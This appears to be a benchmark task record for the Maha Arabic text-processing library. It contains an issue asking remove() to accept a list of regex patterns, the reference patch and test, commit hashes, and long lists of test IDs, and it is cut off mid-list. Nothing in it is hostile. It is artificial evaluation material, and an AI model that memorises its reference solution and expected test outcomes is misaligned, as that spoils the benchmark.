"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_beforeCommitHooks",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_savepoints",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_w_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_commit_wo_savepoints_wo_hooks_wo_synchronizers",
"transaction/tests/test__transaction.py::TransactionTests::test_ctor_w_syncs",
"transaction/tests/test__transaction.py::TransactionTests::test_data",
"transaction/tests/test__transaction.py::TransactionTests::test_doom_active",
"transaction/tests/test__transaction.py::TransactionTests::test_doom_already_doomed",
"transaction/tests/test__transaction.py::TransactionTests::test_doom_invalid",
"transaction/tests/test__transaction.py::TransactionTests::test_getAfterCommitHooks_empty",
"transaction/tests/test__transaction.py::TransactionTests::test_getBeforeCommitHooks_empty",
"transaction/tests/test__transaction.py::TransactionTests::test_isDoomed",
"transaction/tests/test__transaction.py::TransactionTests::test_join_ACTIVE_w_preparing_w_sp2index",
"transaction/tests/test__transaction.py::TransactionTests::test_join_COMMITFAILED",
"transaction/tests/test__transaction.py::TransactionTests::test_join_COMMITTED",
"transaction/tests/test__transaction.py::TransactionTests::test_join_COMMITTING",
"transaction/tests/test__transaction.py::TransactionTests::test_join_DOOMED_non_preparing_wo_sp2index",
"transaction/tests/test__transaction.py::TransactionTests::test_note",
"transaction/tests/test__transaction.py::TransactionTests::test_register_w_jar",
"transaction/tests/test__transaction.py::TransactionTests::test_register_w_jar_already_adapted",
"transaction/tests/test__transaction.py::TransactionTests::test_register_wo_jar",
"transaction/tests/test__transaction.py::TransactionTests::test_savepoint_COMMITFAILED",
"transaction/tests/test__transaction.py::TransactionTests::test_savepoint_empty",
"transaction/tests/test__transaction.py::TransactionTests::test_savepoint_non_optimistc_resource_wo_support",
"transaction/tests/test__transaction.py::TransactionTests::test_setExtendedInfo_multiple",
"transaction/tests/test__transaction.py::TransactionTests::test_setUser_default_path",
"transaction/tests/test__transaction.py::TransactionTests::test_setUser_explicit_path",
"transaction/tests/test__transaction.py::TransactionTests::test_verifyImplements_ITransaction",
"transaction/tests/test__transaction.py::TransactionTests::test_verifyProvides_ITransaction",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test___repr__",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_abort",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_abort_w_error",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_commit",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_ctor",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_sortKey",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_abort",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_begin",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_finish",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_vote",
"transaction/tests/test__transaction.py::Test_rm_key::test_hit",
"transaction/tests/test__transaction.py::Test_rm_key::test_miss",
"transaction/tests/test__transaction.py::Test_object_hint::test_hit",
"transaction/tests/test__transaction.py::Test_object_hint::test_miss",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_nonstring",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_all_Fs",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_not_8_chars",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_xxx",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_z64",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_abort",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_commit",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_ctor",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_sortKey",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_abort",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_begin",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_finish",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_vote",
"transaction/tests/test__transaction.py::SavepointTests::test_ctor_w_savepoint_aware_resources",
"transaction/tests/test__transaction.py::SavepointTests::test_ctor_w_savepoint_oblivious_resource_non_optimistic",
"transaction/tests/test__transaction.py::SavepointTests::test_ctor_w_savepoint_oblivious_resource_optimistic",
"transaction/tests/test__transaction.py::SavepointTests::test_rollback_w_sp_error",
"transaction/tests/test__transaction.py::SavepointTests::test_rollback_w_txn_None",
"transaction/tests/test__transaction.py::SavepointTests::test_valid_w_transacction",
"transaction/tests/test__transaction.py::SavepointTests::test_valid_wo_transacction",
"transaction/tests/test__transaction.py::AbortSavepointTests::test_ctor",
"transaction/tests/test__transaction.py::AbortSavepointTests::test_rollback",
"transaction/tests/test__transaction.py::NoRollbackSavepointTests::test_ctor",
"transaction/tests/test__transaction.py::NoRollbackSavepointTests::test_rollback",
"transaction/tests/test__transaction.py::MiscellaneousTests::test_BBB_join",
"transaction/tests/test__transaction.py::MiscellaneousTests::test_bug239086",
"transaction/tests/test__transaction.py::test_suite"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-11-11 17:20:00+00:00
|
zpl-2.1
| 6,395
|
|
TRoboto__Maha-103
|
diff --git a/maha/cleaners/functions/remove_fn.py b/maha/cleaners/functions/remove_fn.py
index 1385f34..47786b8 100644
--- a/maha/cleaners/functions/remove_fn.py
+++ b/maha/cleaners/functions/remove_fn.py
@@ -3,6 +3,8 @@ Functions that operate on a string and remove certain characters.
"""
from __future__ import annotations
+from maha.rexy import non_capturing_group
+
__all__ = [
"remove",
"remove_strings",
@@ -92,7 +94,7 @@ def remove(
emojis: bool = False,
use_space: bool = True,
custom_strings: list[str] | str | None = None,
- custom_expressions: ExpressionGroup | Expression | str | None = None,
+ custom_expressions: ExpressionGroup | Expression | list[str] | str | None = None,
):
"""Removes certain characters from the given text.
@@ -168,7 +170,7 @@ def remove(
for more information, by default True
custom_strings:
Include any other string(s), by default None
- custom_expressions: Union[:class:`~.ExpressionGroup`, :class:`~.Expression`, str]
+ custom_expressions:
Include any other regular expression expressions, by default None
Returns
@@ -213,11 +215,15 @@ def remove(
if isinstance(custom_strings, str):
custom_strings = [custom_strings]
+ chars_to_remove.extend(custom_strings)
+
+ # expressions to remove
if isinstance(custom_expressions, str):
custom_expressions = Expression(custom_expressions)
- chars_to_remove.extend(custom_strings)
- # expressions to remove
+ elif isinstance(custom_expressions, list):
+ custom_expressions = Expression(non_capturing_group(*custom_expressions))
+
expressions_to_remove = ExpressionGroup(custom_expressions)
# Since each argument has the same name as the corresponding constant
|
TRoboto/Maha
|
8908cd383ec4af6805be25bfe04ec3e4df6f7939
|
diff --git a/tests/cleaners/test_remove.py b/tests/cleaners/test_remove.py
index df184a8..071f5a6 100644
--- a/tests/cleaners/test_remove.py
+++ b/tests/cleaners/test_remove.py
@@ -823,3 +823,12 @@ def test_remove_arabic_letter_dots_with_edge_case(input: str, expected: str):
def test_remove_arabic_letter_dots_general(input: str, expected: str):
assert remove_arabic_letter_dots(input) == expected
+
+
+def test_remove_list_input(simple_text_input: str):
+ list_ = ["بِسْمِ", "the", "ال(?=ر)"]
+ processed_text = remove(text=simple_text_input, custom_expressions=list_)
+ assert (
+ processed_text
+ == "1. ،اللَّهِ رَّحْمَٰنِ رَّحِيمِ In name of Allah,Most Gracious, Most Merciful."
+ )
|
Adding a list of strings to cleaner functions
### What problem are you trying to solve?
Enhance the cleaners functions to take a list of strings as input if needed.
### Examples (if relevant)
```py
>>> from maha.cleaners.functions import remove
>>> text = "من اليوم سوف ينتقل صديقي منور من المدينة المنورة وعنوانه الجديد هو الرياض"
>>>remove(text, custom_expressions = [r"\bمن\b", r"\bعن\b")
'اليوم سوف ينتقل صديقي منور المدينة المنورة وعنوانه الجديد هو الرياض'
```
### Definition of Done
- It must adhere to the coding style used in the defined cleaner functions.
- The implementation should cover most use cases.
- Adding tests
|
0.0
|
8908cd383ec4af6805be25bfe04ec3e4df6f7939
|
[
"tests/cleaners/test_remove.py::test_remove_list_input"
] |
[
"tests/cleaners/test_remove.py::test_remove_with_arabic",
"tests/cleaners/test_remove.py::test_remove_with_english",
"tests/cleaners/test_remove.py::test_remove_english",
"tests/cleaners/test_remove.py::test_remove_with_false_use_space",
"tests/cleaners/test_remove.py::test_remove_with_random_true_inputs",
"tests/cleaners/test_remove.py::test_remove_with_arabic_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_small_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_capital_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_capital_letters_false_use_space",
"tests/cleaners/test_remove.py::test_remove_with_numbers",
"tests/cleaners/test_remove.py::test_remove_numbers",
"tests/cleaners/test_remove.py::test_remove_with_harakat",
"tests/cleaners/test_remove.py::test_remove_harakat",
"tests/cleaners/test_remove.py::test_remove_all_harakat",
"tests/cleaners/test_remove.py::test_remove_with_punctuations",
"tests/cleaners/test_remove.py::test_remove_punctuations",
"tests/cleaners/test_remove.py::test_remove_with_arabic_numbers",
"tests/cleaners/test_remove.py::test_remove_with_english_numbers",
"tests/cleaners/test_remove.py::test_remove_with_arabic_punctuations",
"tests/cleaners/test_remove.py::test_remove_with_english_punctuations",
"tests/cleaners/test_remove.py::test_remove_with_custom_character",
"tests/cleaners/test_remove.py::test_remove_with_custom_characters_not_found[test]",
"tests/cleaners/test_remove.py::test_remove_with_custom_characters_not_found[strings1]",
"tests/cleaners/test_remove.py::test_remove_with_custom_patterns[[A-Za-z]]",
"tests/cleaners/test_remove.py::test_remove_with_tatweel",
"tests/cleaners/test_remove.py::test_remove_tatweel",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring_default",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring_raises_valueerror",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[h",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[heheh",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647-\\u0647\\u0647-3-2]",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[heeellloooooooo-helo-2-1]",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[heeelloooooooo-hello-3-1]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u0648\\u0644\\u0642\\u062f",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0627\\u0644\\u0648\\u0631\\u062f",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u064a\\u0627",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u0623\\u0643\\u062b\\u0631",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u064a\\u062c\\u0628",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[.#\\u0643\\u0631\\u0629",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[@#\\u0628\\u0631\\u0645\\u062c\\u0629-@#\\u0628\\u0631\\u0645\\u062c\\u0629]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629-_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645-&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#11111\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647-11111\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0645\\u0633\\u0623\\u0644\\u0629_\\u0631\\u0642\\u0645_1111-\\u0645\\u0633\\u0623\\u0644\\u0629_\\u0631\\u0642\\u0645_1111]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#Hello-Hello]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0645\\u0631\\u062d\\u0628\\u0627-\\u0645\\u0631\\u062d\\u0628\\u0627]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[&#\\u0631\\u0645\\u0636\\u0627\\u0646-&#\\u0631\\u0645\\u0636\\u0627\\u0646]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[_#\\u0627\\u0644\\u0639\\u064a\\u062f-_#\\u0627\\u0644\\u0639\\u064a\\u062f]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[^#\\u0627\\u0644\\u062a\\u0639\\u0644\\u064a\\u0645_\\u0644\\u0644\\u062c\\u0645\\u064a\\u0639-^\\u0627\\u0644\\u062a\\u0639\\u0644\\u064a\\u0645_\\u0644\\u0644\\u062c\\u0645\\u064a\\u0639]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[:#\\u0627\\u0644\\u0631\\u064a\\u0627\\u0636\\u0629-:\\u0627\\u0644\\u0631\\u064a\\u0627\\u0636\\u0629]",
"tests/cleaners/test_remove.py::test_remove_with_ligtures",
"tests/cleaners/test_remove.py::test_remove_with_hashtags_simple",
"tests/cleaners/test_remove.py::test_remove_with_hashtags_with_arabic",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#test-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[test",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#hashtag_start",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#hashtag",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642hashtag",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#123-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629-_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645-&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[11111#\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647-11111#\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[.#Good-.]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[@#test-@#test]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[AB#CD-AB#CD]",
"tests/cleaners/test_remove.py::test_remove_hashtags",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#test-]",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642-#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642]",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[test",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#hashtag_start",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#hashtag",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642hashtag",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#123-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#test-#test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0645\\u0646\\u0634\\u0646-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[test",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#hashtag",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#hashtag_start",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642hashtag",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#123-#123]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@test-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0645\\u0646\\u0634\\u0646-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[email@web.com-email@web.com]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[test",
"tests/cleaners/test_remove.py::test_remove_with_mentions[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@mention_start",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0645\\u0646\\u0634\\u0646",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642mention",
"tests/cleaners/test_remove.py::test_remove_with_mentions[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@123-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@mention",
"tests/cleaners/test_remove.py::test_remove_with_mentions[_@\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629-_@\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[&@\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645-&@\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[11111@\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647-11111@\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[.@Good-.]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[AB@CD-AB@CD]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[#@test-#@test]",
"tests/cleaners/test_remove.py::test_remove_mentions",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@test-]",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@\\u0645\\u0646\\u0634\\u0646-@\\u0645\\u0646\\u0634\\u0646]",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[test",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@mention_start",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@\\u0645\\u0646\\u0634\\u0646",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@mention",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642mention",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@123-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@test-@test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0645\\u0646\\u0634\\u0646-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[email@web.com-email@web.com]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[test",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@mention_start",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0645\\u0646\\u0634\\u0646",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642mention",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@123-@123]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_emails[@test-@test]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email@web.com-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email123-d@web-1.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email@web.co.uk-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email@web-email@web]",
"tests/cleaners/test_remove.py::test_remove_emails",
"tests/cleaners/test_remove.py::test_remove_with_links[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_links[.test.-.test.]",
"tests/cleaners/test_remove.py::test_remove_with_links[web.com-]",
"tests/cleaners/test_remove.py::test_remove_with_links[web-1.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[web.co.uk-]",
"tests/cleaners/test_remove.py::test_remove_with_links[www.web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[http://web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[http://www.web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[https://web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[https://www.web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[https://www.web.notwebsite.noo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[www.web.notwebsite.noo-www.web.notwebsite.noo]",
"tests/cleaners/test_remove.py::test_remove_with_links[www.web.website.com-]",
"tests/cleaners/test_remove.py::test_remove_with_empty_string",
"tests/cleaners/test_remove.py::test_remove_links",
"tests/cleaners/test_remove.py::test_remove_should_raise_valueerror",
"tests/cleaners/test_remove.py::test_remove_with_random_input",
"tests/cleaners/test_remove.py::test_remove_with_emojis",
"tests/cleaners/test_remove.py::test_remove_strings[\\u0628\\u0650\\u0633\\u0652\\u0645\\u0650\\u0627\\u0644\\u0644\\u0651\\u064e\\u0647\\u0650",
"tests/cleaners/test_remove.py::test_remove_strings[1.",
"tests/cleaners/test_remove.py::test_remove_strings_raise_valueerror",
"tests/cleaners/test_remove.py::test_remove_patterns",
"tests/cleaners/test_remove.py::test_remove_extra_spaces[--1]",
"tests/cleaners/test_remove.py::test_remove_extra_spaces[",
"tests/cleaners/test_remove.py::test_remove_extra_spaces[test",
"tests/cleaners/test_remove.py::test_remove_extra_spaces_raise_valueerror",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0628-\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062a-\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062b-\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062c-\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062e-\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0630-\\u062f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0632-\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0634-\\u0633]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0636-\\u0635]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0638-\\u0637]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u063a-\\u0639]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0641-\\u06a1]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0642-\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0646-\\u06ba]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u064a-\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0629-\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0628\\u0627\\u0628-\\u066e\\u0627\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062a\\u0644-\\u066e\\u0644]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062b\\u0631\\u0648\\u0629-\\u066e\\u0631\\u0648\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062c\\u0645\\u0644-\\u062d\\u0645\\u0644]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062e\\u0648-\\u062d\\u0648]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0630\\u0648\\u0642-\\u062f\\u0648\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0632\\u064a\\u0627\\u062f\\u0629-\\u0631\\u0649\\u0627\\u062f\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0634\\u0645\\u0633-\\u0633\\u0645\\u0633]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0636\\u0648\\u0621-\\u0635\\u0648\\u0621]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0638\\u0644\\u0627\\u0645-\\u0637\\u0644\\u0627\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u063a\\u064a\\u0645-\\u0639\\u0649\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0641\\u0648\\u0642-\\u06a1\\u0648\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0642\\u0644\\u0628-\\u066f\\u0644\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0646\\u0648\\u0631-\\u066e\\u0648\\u0631]",
